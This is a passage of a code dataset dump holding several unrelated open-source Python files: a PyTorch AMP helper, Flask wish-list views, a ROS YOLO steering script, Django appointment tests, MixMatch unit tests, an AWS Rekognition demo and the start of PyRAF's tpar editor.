pytorch, util\n\n# AMP is only available in PyTorch 1.6+\ntry:\n import torch.cuda.amp as amp\nexcept ImportError:\n # A warning is logged in _pytorch_context.py\n pass\n\n\nclass PyTorchExperimentalContext:\n def __init__(self, parent: Any) -> None:\n self._parent = parent\n self._auto_amp = False\n\n def use_amp(self) -> None:\n \"\"\"\n Handles all operations for the most simple cases automatically with a default gradient\n scaler. Specifically, wraps forward pass in an autocast context, scales loss before\n backward pass, unscales before clipping gradients, uses scaler when stepping\n optimizer(s), and updates scaler afterwards. 
Do not call ``wrap_scaler`` directly when\n using this method.\n\n PyTorch 1.6 or greater is required for this feature.\n \"\"\"\n self._parent.wrap_scaler(amp.GradScaler()) # type: ignore\n self._auto_amp = True\n\n @util.deprecated(\n \"context.experimental.reset_reducers() is deprecated since 0.15.2 and will be removed in a \"\n \"future version; use context.reset_reducers() directly.\"\n )\n def reset_reducers(self) -> None:\n self._parent.reset_reducers()\n\n @util.deprecated(\n \"context.experimental.wrap_reducer() is deprecated since 0.15.2 and will be removed in a \"\n \"future version; use context.wrap_reducer() directly.\"\n )\n def wrap_reducer(\n self,\n reducer: Union[Callable, pytorch.MetricReducer],\n name: Optional[str] = None,\n for_training: bool = True,\n for_validation: bool = True,\n ) -> pytorch.MetricReducer:\n return cast(\n pytorch.MetricReducer,\n self._parent.wrap_reducer(reducer, name, for_training, for_validation),\n )\n\n @util.deprecated(\n \"context.experimental.reduce_metrics() is deprecated since 0.15.2 and will be removed in a \"\n \"future version; use context.reduce_metrics() directly.\"\n )\n def reduce_metrics(self, for_training: bool) -> Dict[str, Any]:\n return cast(\n dict,\n self._parent.reduce_metrics(for_training),\n )\n","repo_name":"ahj-determined/determined","sub_path":"harness/determined/pytorch/_experimental.py","file_name":"_experimental.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"15676890749","text":"import datetime\nfrom typing import Any\n\nfrom flask import render_template, current_app, request, flash, redirect, url_for, jsonify, Blueprint\nfrom flask_login import login_required, current_user\nfrom flask_paginate import Pagination, get_page_args\n\nfrom app import app\nfrom app.forms import WishForm\nfrom app.models.item import Item\nfrom app.models.property import Property\nfrom app.models.wish import Wish\nfrom app.models.wish_property import WishProperty\nfrom app.services.base_wish_list_service import BaseWishListService\n\nwish_list = Blueprint('wish_list', __name__, url_prefix='/wish_list')\n\n\n@app.route('/', methods=['GET', 'POST'])\n@wish_list.route('/index', methods=['GET', 'POST'])\n@login_required\ndef index(wish_list_service: BaseWishListService) -> Any:\n \"\"\"\n Wish List主頁,列出使用者所有的Wish\n Args:\n wish_list_service: WishList相關的商業邏輯\n\n Returns: Any\n\n \"\"\"\n wishes = wish_list_service.get_user_wishes(Wish(user_id=current_user.id))\n\n page, per_page, start = get_page_args(page_parameter='page', per_page_parameter='per_page')\n pagination = Pagination(page=page, per_page=per_page, total=len(wishes), bs_version=4, alignment='center',\n record_name='wishes')\n\n img_item_dir_url = current_app.config['IMG_DIR_URL'] or ''\n\n return render_template('wish_list/index.html', title='Wish List', current_user=current_user,\n wishes=wishes[start:start + per_page],\n pagination=pagination, img_item_dir_url=img_item_dir_url)\n\n\n@wish_list.route('/delete_wish/', defaults={'id': None}, methods=['POST'])\n@wish_list.route('/delete_wish/', methods=['POST'])\n@login_required\ndef delete_wish(id, wish_list_service: BaseWishListService) -> Any:\n \"\"\"\n 刪除某個Wish\n Args:\n id: Wish id\n wish_list_service: WishList相關的商業邏輯\n\n Returns: Any\n\n \"\"\"\n wish_list_service.delete_wish_from_list(Wish(id=id))\n return redirect(url_for('wish_list.index'))\n\n\n@wish_list.route('/new_wish/', defaults={'id': None}, methods=['GET', 
'POST'])\n@wish_list.route('/edit_wish/', methods=['GET', 'POST'])\n@login_required\ndef edit_wish(id, wish_list_service: BaseWishListService) -> Any:\n \"\"\"\n 新增/修改某個Wish\n Args:\n id: Wish id\n wish_list_service: WishList相關的商業邏輯\n\n Returns: Any\n\n \"\"\"\n obj = wish_list_service.get_wish_by_id(Wish(id=id))\n if obj:\n obj.item_type = obj.item.type\n\n form = WishForm(obj=obj)\n\n # bind item type\n item_typies = wish_list_service.get_all_item_types()\n form.item_type.choices = [(item_type.id, item_type.name) for item_type in item_typies]\n form.item_type.choices.insert(0, ('', 'Choose'))\n\n # bind item\n items = wish_list_service.get_all_these_types_of_items(Item(type=form.item_type.data))\n form.item_id.choices = [(item.id, item.name) for item in items]\n form.item_id.choices.insert(0, ('', 'Choose'))\n\n # bind property\n properties = wish_list_service.get_all_the_property_of_this_item(Property(item_id=form.item_id.data))\n\n if properties:\n num_of_types = max(property.type for property in properties)\n\n for i in range(num_of_types):\n if len(form.wish_properties.entries) <= i or len(form.wish_properties.entries) == 0:\n form.wish_properties.append_entry()\n form.wish_properties.entries[i].form.property_id.choices.insert(0, ('', 'Any', {'tip': ''}))\n\n [form.wish_properties.entries[property.type - 1].form.property_id.choices.append((property.id, property.name, {\n 'tip': '★' if property.is_ability else (f'{str(property.min)} - {str(property.max)}'\n if (property.min and property.max) else '')}))\n for property in properties]\n\n form.wish_properties.entries[0].form.property_id.label.text = 'Property'\n form.wish_properties.entries[0].form.roll.label.text = 'Roll'\n\n if request.method == 'POST' and form.validate_on_submit():\n\n wish = Wish(\n id=id,\n currency=form.currency.data,\n min_level=form.min_level.data,\n max_bid=form.max_bid.data,\n max_buyout=form.max_buyout.data,\n user_id=current_user.id,\n item_id=form.item_id.data,\n create_date=datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n modify_date=datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n )\n\n for i, property_form in enumerate(form.wish_properties.data, start=1):\n wish_property = WishProperty(\n type=i,\n roll=property_form['roll'],\n property_id=property_form['property_id'] or None,\n wish_id=id,\n create_date=datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n modify_date=datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n wish.wish_properties.append(wish_property)\n\n wish_list_service.add_new_wish(wish)\n\n flash('Save success', 'success')\n return redirect(url_for('wish_list.index'))\n\n return render_template('wish_list/edit_wish.html', form=form, current_user=current_user,\n title='New Wish' if id is None else 'Edit Wish')\n\n\n@wish_list.route('/item/', defaults={'type': None}, methods=['POST'])\n@wish_list.route('/item/')\n@login_required\ndef item(type, wish_list_service: BaseWishListService) -> Any:\n \"\"\"\n 取得所有某個類型的道具\n Args:\n type: 道具類型\n wish_list_service: WishList相關的商業邏輯\n\n Returns: Any\n\n \"\"\"\n items = wish_list_service.get_all_these_types_of_items(Item(type=type))\n items_array = [{'id': item.id, 'name': item.name} for item in items]\n items_array.insert(0, {'id': '', 'name': 'Choose'})\n\n return jsonify({'items': items_array})\n\n\n@wish_list.route('/property/', defaults={'item_id': None}, methods=['POST'])\n@wish_list.route('/property/')\n@login_required\ndef property(item_id, wish_list_service: BaseWishListService) -> Any:\n \"\"\"\n 取得某個道具的屬性\n Args:\n 
item_id: 道具id\n wish_list_service: WishList相關的商業邏輯\n\n Returns: Any\n\n \"\"\"\n properties = wish_list_service.get_all_the_property_of_this_item(Property(item_id=item_id))\n\n property_array = []\n\n if properties:\n num_of_types = max(property.type for property in properties)\n\n [property_array.append({'id': '', 'name': 'Any', 'type': i + 1, 'tip': ''}) for\n i in range(num_of_types)]\n\n [property_array.append({'id': property.id, 'name': property.name, 'type': property.type,\n 'tip': '★' if property.is_ability else (f'{str(property.min)} - {str(property.max)}'\n if (property.min and property.max) else '')})\n for property in properties]\n\n return jsonify({'properties': property_array})\n","repo_name":"edensquall/RoshpitWishList","sub_path":"app/views/wish_list.py","file_name":"wish_list.py","file_ext":"py","file_size_in_byte":7067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24581702660","text":"from ultralytics import YOLO\nimport cv2\nimport torch\nimport numpy as np\nimport rclpy\nfrom rclpy.node import Node\nfrom steady_msgs import WriteCar\n\n\nclass YOLOPlanning(Node):\n def __init__(self):\n super().__init__('yolo_planning')\n self.erp_pub = self.create_publisher(WriteCar, 'complex_control', 10)\n self.erp = WriteCar()\n\n def pub_serial(self, go, speed, steer):\n self.erp.complex = go #True false\n self.erp.write_speed = speed\n self.erp.write_steer = steer\n self.erp_pub.publish(self.erp)\n\nmodel = YOLO('complex1.pt') # pretrained YOLOv8n model\n\n\nresults = model.predict(\"z2.jpg\", show=True)\n\ngo = False\nsteer = 0\nspeed = 60\n\n\n# Priority\n# x -> y -> stop_line -> speedbump -> z -> speed_sign\n'''\nspeed_sign : 0\nspeedbump : 1\nstop_line : 2\nx : 3\ny : 4\nz : 5\n'''\ndef yolo_steer(node):\n for r in results:\n box = r.boxes\n box_cls = box.cls.cpu().detach().numpy().tolist()\n box_xys = box.xyxy.cpu().detach().numpy().tolist()\n # cam_centre = 320\n image_x = r.orig_shape\n cam_centre = image_x[1]/2\n #normalized 0~1 사이인지 보고 0.5 도 확인\n\n \n # if gap is +, it's on left, when - it's on right\n\n print(\"box_cls : \", box_cls)\n print(\"box_xys : \", box_xys)\n\n if len(box_cls) > 0:\n go = True\n print(\"True\")\n\n\n if 3.0 in box_cls:\n box_ind = box_cls.index(3.0)\n print(\"x\")\n print(\"=======\")\n box_x = (box_xys[box_ind][0] + box_xys[box_ind][2])/2\n gap = cam_centre - box_x\n # if box_x < cam_centre:\n if 0 <= gap < 30:\n steer = 0\n print(\"turn left, steer 0\")\n elif 30 <= gap < 60:\n steer = -60\n print(\"turn left, steer -60\")\n elif 60 <= gap:\n steer = -90\n print(\"turn left, steer -90\")\n elif -30 < gap <= 0:\n steer = 0\n print(\"turn right, steer 0\")\n elif -60 < gap <= -30:\n steer = 60\n print(\"turn right, steer 60\")\n elif gap <= -60:\n steer = 90\n print(\"turn right, steer 90\")\n\n elif 4.0 in box_cls:\n box_ind = box_cls.index(4.0)\n print(\"y\")\n print(\"=======\")\n box_x = (box_xys[box_ind][0] + box_xys[box_ind][2])/2\n gap = cam_centre - box_x\n if 0 <= gap < 30:\n steer = 0\n print(\"turn left, steer 0\")\n elif 30 <= gap < 60:\n steer = -60\n print(\"turn left, steer -60\")\n elif 60 <= gap:\n steer = -90\n print(\"turn left, steer -90\")\n elif -30 < gap <= 0:\n steer = 0\n print(\"turn right, steer 0\")\n elif -60 < gap <= -30:\n steer = 60\n print(\"turn right, steer 60\")\n elif gap <= -60:\n steer = 90\n print(\"turn right, steer 90\")\n\n elif 2.0 in box_cls:\n box_ind = box_cls.index(2.0)\n print(\"stop_line\")\n print(\"=======\")\n box_x = 
(box_xys[box_ind][0] + box_xys[box_ind][2])/2\n gap = cam_centre - box_x\n if 0 <= gap < 30:\n steer = 0\n print(\"turn left, steer 0\")\n elif 30 <= gap < 60:\n steer = -60\n print(\"turn left, steer -60\")\n elif 60 <= gap:\n steer = -90\n print(\"turn left, steer -90\")\n elif -30 < gap <= 0:\n steer = 0\n print(\"turn right, steer 0\")\n elif -60 < gap <= -30:\n steer = 60\n print(\"turn right, steer 60\")\n elif gap <= -60:\n steer = 90\n print(\"turn right, steer 90\")\n\n elif 1.0 in box_cls:\n box_ind = box_cls.index(1.0)\n print(\"speedbump\")\n print(\"=======\")\n box_x = (box_xys[box_ind][0] + box_xys[box_ind][2])/2\n gap = cam_centre - box_x\n if 0 <= gap < 30:\n steer = 0\n print(\"turn left, steer 0\")\n elif 30 <= gap < 60:\n steer = -60\n print(\"turn left, steer -60\")\n elif 60 <= gap:\n steer = -90\n print(\"turn left, steer -90\")\n elif -30 < gap <= 0:\n steer = 0\n print(\"turn right, steer 0\")\n elif -60 < gap <= -30:\n steer = 60\n print(\"turn right, steer 60\")\n elif gap <= -60:\n steer = 90\n print(\"turn right, steer 90\")\n\n elif 5.0 in box_cls:\n box_ind = box_cls.index(5.0)\n steer = 0\n print(\"z\")\n print(\"=======\")\n print(\"steer 0\")\n \n elif 0.0 in box_cls:\n box_ind = box_cls.index(0.0)\n steer = 0\n print(\"speed_sign\")\n print(\"=======\")\n print(\"steer 0\")\n\n\n # Tollgate\n indices = [i for i, value in enumerate(box_cls) if value == 16.0]\n if len(indices) == 2:\n box_x_values = []\n\n for tollgate_ind in indices:\n box_x = (box_xys[tollgate_ind][0] + box_xys[tollgate_ind][2]) / 2\n box_x_values.append(box_x)\n\n avg_box_tollgate = sum(box_x_values) / 2\n print(\"Average box_x : \", avg_box_tollgate)\n gap_tollgate = cam_centre - avg_box_tollgate\n if 0 <= gap_tollgate < 30:\n steer = 0\n print(\"turn left, steer 0\")\n elif 30 <= gap_tollgate < 60:\n steer = -60\n print(\"turn left, steer -60\")\n elif 60 <= gap_tollgate:\n steer = -90\n print(\"turn left, steer -90\")\n elif -30 < gap_tollgate <= 0:\n steer = 0\n print(\"turn right, steer 0\")\n elif -60 < gap_tollgate <= -30:\n steer = 60\n print(\"turn right, steer 60\")\n elif gap_tollgate <= -60:\n steer = 90\n print(\"turn right, steer 90\")\n\n\n node.pub_serial(go, speed, steer)\n\n\ndef main(args=None):\n rclpy.init(args=args)\n node = YOLOPlanning()\n\n yolo_steer(node)\n\n node.destroy_node()\n rclpy.shutdown()\n\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"aarchiiive/steadylab","sub_path":"src/yo/yo/complex_planning.py","file_name":"complex_planning.py","file_ext":"py","file_size_in_byte":6584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14389792942","text":"from __future__ import unicode_literals\nimport re\nfrom datetime import timedelta, time\n\nfrom django.test import TestCase\nfrom django.utils.timezone import now\nfrom django.urls import reverse\n\nfrom osler.core.models import Patient\nfrom osler.core.tests.test_views import log_in_user, build_user\nfrom osler.users.tests import factories as user_factories\n\nfrom osler.appointment import models\nfrom osler.appointment.test_forms import apt_dict\n\n\nclass TestAppointmentViews(TestCase):\n\n fixtures = ['core', 'workup']\n\n def setUp(self):\n\n self.user = build_user()\n\n log_in_user(self.client, self.user)\n\n self.apt = models.Appointment.objects.create(\n comment='test this stuff',\n clindate=now().date(),\n clintime=time(9, 0),\n appointment_type='PSYCH_NIGHT',\n author=self.user,\n author_type=self.user.groups.first(),\n 
patient=Patient.objects.first())\n\n def test_new_appointment_view(self):\n # Getting to new appointment view\n response = self.client.get(reverse(\"appointment-new\"))\n self.assertEqual(response.status_code, 200)\n\n # Posting new appointment\n response = self.client.post(reverse(\"appointment-new\"), data=apt_dict())\n self.assertEqual(response.status_code, 302)\n\n def test_update_appointment_view(self):\n apt = models.Appointment.objects.first()\n\n # Getting to appointment update view\n response = self.client.get(reverse(\"appointment-update\",\n kwargs={'pk': apt.pk}))\n self.assertEqual(response.status_code, 200)\n\n # Posting updated appointment\n self.assertEqual(apt.comment, 'test this stuff')\n response = self.client.post(reverse('appointment-update',\n kwargs={'pk': apt.pk}), data=apt_dict())\n self.assertEqual(response.status_code, 302)\n self.assertRedirects(response, reverse('appointment-list'))\n \n apt_test = models.Appointment.objects.filter(id=apt.pk).first()\n self.assertEqual(apt_test.comment, 'stuff')\n\n def test_new_appointment_with_patient_name(self):\n #Get new appointment view\n url = \"%s?pt_id=%s\" % (reverse(\"appointment-new\"),\n Patient.objects.filter(pk=1).first().pk)\n response = self.client.get(url)\n self.assertEqual(response.context['form'].initial['patient'],\n Patient.objects.filter(pk=1).first())\n\n def test_new_appointment_with_date(self):\n response = self.client.get(\"%s?date=%s\" %\n (reverse(\"appointment-new\"), now().date()))\n self.assertEqual(response.context['form'].initial['clindate'],\n now().date().strftime(\"%Y-%m-%d\"))\n\n def test_mark_noshow(self):\n self.assertEqual(self.apt.pt_showed, None)\n self.assertEqual(models.Appointment.objects.count(), 1)\n\n response = self.client.get(reverse(\"appointment-mark-no-show\",\n args=(self.apt.pk,)))\n\n self.assertRedirects(response, reverse('appointment-list'))\n\n self.assertEqual(models.Appointment.objects.count(), 1)\n self.assertEqual(models.Appointment.objects.first().pt_showed, False)\n\n response = self.client.get('appointment-list')\n # one 'mark as noshow' link should be gone now\n noshow_links = re.findall(\n re.escape('href=\"/appointment/') +\n r'[0-9]+' +\n re.escape('/noshow'),\n response.content.decode('utf-8'))\n self.assertEqual(len(noshow_links), 0)\n\n def test_mark_arrived(self):\n assert self.apt.pt_showed is None\n assert models.Appointment.objects.count() == 1\n\n response = self.client.get(reverse(\"appointment-mark-arrived\",\n args=(self.apt.pk,)))\n self.assertRedirects(\n response,\n reverse(\"core:patient-update\", args=(self.apt.patient.pk,))\n )\n\n assert models.Appointment.objects.count() == 1\n assert models.Appointment.objects.first().pt_showed is True\n\n response = self.client.get('appointment-list')\n # one 'mark as arrived' link should be gone now\n arrived_links = re.findall(\n re.escape('href=\"/appointment/') +\n r'[0-9]+' +\n re.escape('/arrived'),\n response.content.decode('utf-8'))\n\n assert len(arrived_links) == 0\n\n def test_first_apt_is_today(self):\n\n apts = []\n for datedelta in [-1, 1]:\n date = now().date() - timedelta(days=datedelta)\n\n apts.append(models.Appointment.objects.create(\n comment='test this stuff',\n clindate=date,\n clintime=time(9, 0),\n appointment_type='PSYCH_NIGHT',\n author=self.user,\n author_type=self.user.groups.first(),\n patient=Patient.objects.first()))\n\n # three appointments should exist, total\n self.assertEqual(models.Appointment.objects.count(), 3)\n\n response = 
self.client.get(reverse(\"appointment-list\"), follow=True)\n self.assertTemplateUsed('appointment/appointment_list.html')\n\n # only two panels should appear, since one apt is in the past and\n # two fall on the same day (today)\n for i in range(2):\n self.assertContains(\n response, 'appointment-panel-%s' % i)\n self.assertContains(\n response, 'appointment-table-%s' % i)\n\n # only one new appointment link should appear, since the \"today\"\n # panel shouldn't get one\n new_appointment_links = re.findall(\n re.escape('href=\"/appointment/new?date=') +\n r'[0-9]{4}-[0-9]{2}-[0-9]{2}',\n response.content.decode('utf-8'))\n\n self.assertEqual(len(new_appointment_links), 1)\n\n # one 'mark as noshow' link should appear, since the the today\n # panel has two pts\n noshow_links = re.findall(\n re.escape('href=\"/appointment/') +\n r'[0-9]+' +\n re.escape('/noshow'),\n response.content.decode('utf-8'))\n\n self.assertEqual(len(noshow_links), 1)\n\n # one 'mark as here' link should appear, since the the today\n # panel has two pts\n arrived_links = re.findall(\n re.escape('href=\"/appointment/') +\n r'[0-9]+' +\n re.escape('/arrived'),\n response.content.decode('utf-8'))\n\n self.assertEqual(len(arrived_links), 1)\n","repo_name":"llemr-conspiracy/llemr","sub_path":"osler/appointment/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":6640,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"47"} +{"seq_id":"42765629154","text":"\n\n#!/usr/bin/python\n\nfrom resizer import Resizer\n\n\n\n# gts2mini: 306 x 354\n# bipU: 302 x 320\n# bip3: 240 x 280\n\nscaleGTS2toBIP3 = (240 / 348, 280 / 442)\n\noutputDirName = 'bip3'\n\nresizer = Resizer(outputDirName, scaleGTS2toBIP3)\nresizer.process()\n \n\n\n\n","repo_name":"Tnxec2/amazfit-gts2mini-bip-resizer","sub_path":"gts2ToBip3.py","file_name":"gts2ToBip3.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32928654240","text":"import torch\nimport sys\nsys.path.append(\"..\")\n\nimport mixmatch as mixmatch\nimport losses as losses\n\ndef test_shape_of_avg_predictions():\n \"\"\"Test snippet of mixmatch averaging labels for classifications\"\"\"\n # Define input values\n aug_predictions = torch.zeros((6, 4, 5)) # N*K,C,..\n N = 3\n K = 2\n\n # Calculate avg_prediction\n avg_prediction = aug_predictions.reshape(N, K, *aug_predictions.shape[1:]).mean(dim=1, keepdim=True)\n\n # Verify shape of avg_prediction\n assert avg_prediction.shape == torch.Size([N, 1, *aug_predictions.shape[1:]])\n\n # Calculate avg_predictions\n avg_predictions = avg_prediction.repeat(1,K,*([1] * (aug_predictions.ndim-1))).reshape(N*K,*aug_predictions.shape[1:])\n\n # Verify shape of avg_predictions\n assert avg_predictions.shape == torch.Size([N*K, *aug_predictions.shape[1:]])\n\n avg_prediction = mixmatch.average_labels(aug_predictions.reshape(N,K, *aug_predictions.shape[1:]))\n print(avg_predictions.shape)\n\ndef test_sharpen():\n # Create example input tensor of shape [N, C, H, W]\n p = torch.nn.functional.softmax(torch.rand((2, 4)),dim=1)\n\n # Sharpen the tensor along the C dimension\n T = 0.3\n dim = 1\n p_sharp = mixmatch.sharpen(p, T, dim)\n\n assert p.shape == p_sharp.shape\n \n # Print shapes of input and output tensors\n # print(p)\n # print(p_sharp)\n\ndef test_mixup():\n # Create some fake data and labels\n data1 = torch.randn(10, 3, 32, 32)\n labels1 = torch.randn(10, 10)\n data2 = torch.randn(10, 3, 
32, 32)\n labels2 = torch.randn(10, 10)\n\n # Create input tuples\n input_tuple1 = (data1, labels1)\n input_tuple2 = (data2, labels2)\n\n # Mix up the data and labels\n mixed_data, mixed_labels, lam = mixmatch.mixup(input_tuple1, input_tuple2)\n\n assert mixed_data.shape == data1.shape\n assert mixed_labels.shape == labels1.shape\n assert lam.shape == data1.shape[0:1]\n\n # print(\"Mixed-up data shape:\", mixed_data.shape)\n # print(\"Mixed-up labels shape:\", mixed_labels.shape)\n # print(\"Mixing coefficients shape:\", lam.shape)\n \n\ndef test_kl_divergence():\n \n # Define input and target tensors\n input_tensor = torch.tensor([[1.0, 2.0, 3.0], [2.0, 3.0, 1.0]])\n target_tensor = torch.tensor([[0.3, 0.3, 0.4], [0.2, 0.5, 0.3]])\n\n # Compute KL divergence with default reduction\n kl_div = losses.kl_divergence(input_tensor, target_tensor)\n\n # Check that output is a scalar\n \n assert isinstance(kl_div, torch.Tensor)\n assert kl_div.shape == torch.Size([])\n\n # Compute KL divergence with reduction='none'\n kl_div_none = losses.kl_divergence(input_tensor, target_tensor, reduction='none')\n\n # Check that output is a tensor with the same shape as the input\n assert isinstance(kl_div_none, torch.Tensor)\n assert kl_div_none.shape == input_tensor.shape\n\n # Check if two same predictions are equal\n input_tensor = torch.tensor([[0, 1e10, 0], [1e10, 0, 0]])\n target_tensor = torch.tensor([[0., 1., 0.], [1., 0., 0.]])\n eps = 1e-3\n\n kl_div = losses.kl_divergence(input_tensor,target_tensor)\n assert kl_div < eps # kl_div always hiher then 0\n\n \n\nif __name__ == \"__main__\":\n #test_shape_of_avg_predictions()\n #test_sharpen()\n #test_mixup()\n test_kl_divergence()\n\n\n\n\n","repo_name":"hruskan1/SSL-diploma-thesis","sub_path":"src/mixmatch/tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"33621192194","text":"import json\nimport boto3\nimport matplotlib.pyplot as plt\nimport cv2\n\nimport os\nos.system('cls')\n\n\nclient = boto3.client(\n 'rekognition',\n aws_access_key_id='aws_access_key_id',\n aws_secret_access_key='aws_secret_access_key',\n region_name='ap-southeast-1'\n)\n\nphoto = \"img/label.jpg\"\nimg = cv2.imread(photo)\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\nwith open(photo, 'rb') as source_image:\n source_bytes = source_image.read()\n\nresponse = client.detect_labels(\n Image={'Bytes': source_bytes},\n MaxLabels=1,\n MinConfidence=99\n)\n\nprint(response)\nplt.subplot(1, 2, 1), plt.imshow(img)\nplt.title('Input'), plt.xticks([]), plt.yticks([])\nplt.subplot(1, 2, 2), plt.imshow(img)\nplt.title('Output'), plt.xticks([]), plt.yticks([])\nplt.show()","repo_name":"mzuhriwijianto/Praktikum-pengolahan-citra","sub_path":"P10/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19003245156","text":"\"\"\"module 'tpar.py' -- main module for generating the tpar task editor\n\ntpar is curses based parameter editing similar to epar. Tpar has the\nprimary goal of simplicity similar to IRAF's CL epar and as such is\nmissing many PyRAF epar features. 
missing many PyRAF epar features. The primary advantage of tpar is\nthat it works in a simple terminal window (rather than requiring full\nX-11 and Tk); this is an improvement for low bandwidth network\ncontexts or for people who prefer text interfaces to GUIs.\n\nTodd Miller, 2006 May 30 derived from epar.py and IRAF CL epar.\n\"\"\"\n\n\n# XXXX Debugging tip: uncomment self.inform() in the debug() method below\n\nimport os\nimport sys\nimport re\n\n\n# Fake out import of urwid if it fails, to keep tpar from bringing down\n# all of PyRAF.\nclass FakeModule:\n    pass\n\nclass FakeClass:\n    pass\n\n\ntry:\n    import urwid.curses_display\n    import urwid.raw_display\n    import urwid\n    from . import urwutil\n    from . import urwfiledlg\n    urwid.set_encoding(\"ascii\")  # gives better performance than 'utf8'\nexcept ImportError as e:\n    urwid = FakeModule()\n    # bind the class itself (not an instance) so the subclass\n    # definitions below still evaluate when urwid is unavailable\n    urwid.Edit = FakeClass\n    urwid.Columns = FakeClass\n    urwid.AttrWrap = FakeClass\n    urwid.Pile = FakeClass\n    urwid.the_error = str(e)\n\n# PyRAF modules\nfrom . import iraf\nfrom . import irafpar\nfrom . import irafhelp\nfrom . import iraftask\nfrom . import iraffunctions\n\nTPAR_HELP_EMACS = \"\"\" EDIT COMMANDS (emacs)\n\n DEL_CHAR = DEL MOVE_RIGHT = RIGHT_ARROW\n DEL_LEFT = ^H_or_BS MOVE_RIGHT = ^F\n DEL_LINE = ^K MOVE_START = ESC-<\n DEL_WORD = ESC-D MOVE_UP = UP_ARROW\n DEL_WORD = ESC-d MOVE_UP = ^P\n EXIT_NOUPD = ^C NEXT_PAGE = ^V\n EXIT_UPDAT = ^D NEXT_WORD = ESC-F\n NEXT_WORD = ESC-f\n GET_HELP = ESC-? PREV_PAGE = ESC-V\n MOVE_BOL = ^A PREV_PAGE = ESC-v\n MOVE_DOWN = DOWN_ARROW PREV_WORD = ESC-B\n MOVE_DOWN = ^N PREV_WORD = ESC-b\n MOVE_END = ESC-> REPAINT = ^L\n MOVE_EOL = ^E UNDEL_CHAR = ESC-^D\n MOVE_LEFT = LEFT_ARROW UNDEL_LINE = ESC-^K\n MOVE_LEFT = ^B UNDEL_WORD = ESC-^W\n\n X-11 Paste: hold down shift and click middle mouse button\n\n :e[!] [pset] edit pset \"!\" == no update\n :q[!] exit tpar \"!\" == no update\n :r! unlearn\n :w[!] [pset] unsupported\n :g[!] run task\n\"\"\"\n\nTPAR_BINDINGS_EMACS = {\n    \"ctrl c\": \"quit\",\n    \"ctrl C\": \"quit\",\n    \"ctrl d\": \"exit\",\n    \"ctrl D\": \"exit\",\n    \"ctrl z\": \"exit\",\n    \"ctrl Z\": \"exit\",\n    \"ctrl p\": \"up\",\n    \"ctrl P\": \"up\",\n    \"shift tab\": \"up\",\n    \"ctrl n\": \"down\",\n    \"ctrl N\": \"down\",\n    \"esc v\": \"page down\",\n    \"esc V\": \"page down\",\n    \"esc p\": \"page up\",\n    \"esc P\": \"page up\",\n\n    # \"ctrl l\" : \"redraw\",  # re-draw... just ignore\n    # \"ctrl L\" : \"redraw\",\n    \"ctrl K\": \"del_line\",\n    \"ctrl k\": \"del_line\",\n    \"esc d\": \"del_word\",\n    \"esc D\": \"del_word\",\n    \"esc f\": \"next_word\",\n    \"esc F\": \"next_word\",\n    \"esc b\": \"prev_word\",\n    \"esc B\": \"prev_word\",\n    \"ctrl a\": \"move_bol\",\n    \"ctrl A\": \"move_bol\",\n    \"ctrl e\": \"move_eol\",\n    \"ctrl E\": \"move_eol\",\n    \"esc >\": \"end\",\n    \"esc <\": \"home\",\n    \"ctrl f\": \"right\",\n    \"ctrl F\": \"right\",\n    \"ctrl b\": \"left\",\n    \"ctrl B\": \"left\",\n    \"esc ctrl d\": \"undel_char\",\n    \"esc ctrl k\": \"undel_line\",\n    \"ctrl y\": \"undel_line\",\n    \"esc ctrl w\": \"undel_word\",\n    \"esc ?\": \"help\"\n}\n\nTPAR_HELP_VI = \"\"\" EDIT COMMANDS (vi)\n\n DEL_CHAR = BACKSPACE MOVE_LEFT = ^H\n DEL_LEFT = DEL MOVE_RIGHT = RIGHT_ARROW\n DEL_LINE = ^I^D MOVE_RIGHT = ^L\n DEL_WORD = ^I^W MOVE_START = ^T^S\n EXIT_NOUPD = ^C MOVE_UP = UP_ARROW\n EXIT_UPDAT = ^D MOVE_UP = ^K\n EXIT_UPDAT = ^Z NEXT_PAGE = ^N\n GET_HELP = ESC-? 
NEXT_WORD = ^W\n MOVE_BOL = ^A PREV_PAGE = ^P\n MOVE_DOWN = DOWN_ARROW PREV_WORD = ^B\n MOVE_DOWN = ^J REPAINT = ^R\n MOVE_END = ^T^E UNDEL_CHAR = ^U^C\n MOVE_EOL = ^E UNDEL_LINE = ^U^L\n MOVE_LEFT = LEFT_ARROW UNDEL_WORD = ^U^W\n\n X-11 Paste: hold down shift and click middle mouse button\n\n :e[!] [pset] edit pset \"!\" == no update\n :q[!] exit tpar \"!\" == no update\n :r! unlearn\n :w[!] [pset] unsupported\n :g[!] run task\n\"\"\"\n\nTPAR_BINDINGS_VI = {\n \"ctrl c\": \"quit\",\n \"ctrl d\": \"exit\",\n \"ctrl C\": \"quit\",\n \"ctrl D\": \"exit\",\n \"ctrl K\": \"up\",\n \"ctrl k\": \"up\",\n \"ctrl j\": \"down\",\n \"ctrl J\": \"down\",\n \"ctrl n\": \"page down\",\n \"ctrl N\": \"page down\",\n \"ctrl p\": \"page up\",\n \"ctrl P\": \"page up\",\n\n # \"ctrl r\" : \"redraw\", # re-draw... just ignore\n # \"ctrl R\" : \"redraw\",\n \"tab ctrl D\": \"del_line\",\n \"tab ctrl d\": \"del_line\",\n \"tab ctrl W\": \"del_word\",\n \"tab ctrl w\": \"del_word\",\n \"ctrl w\": 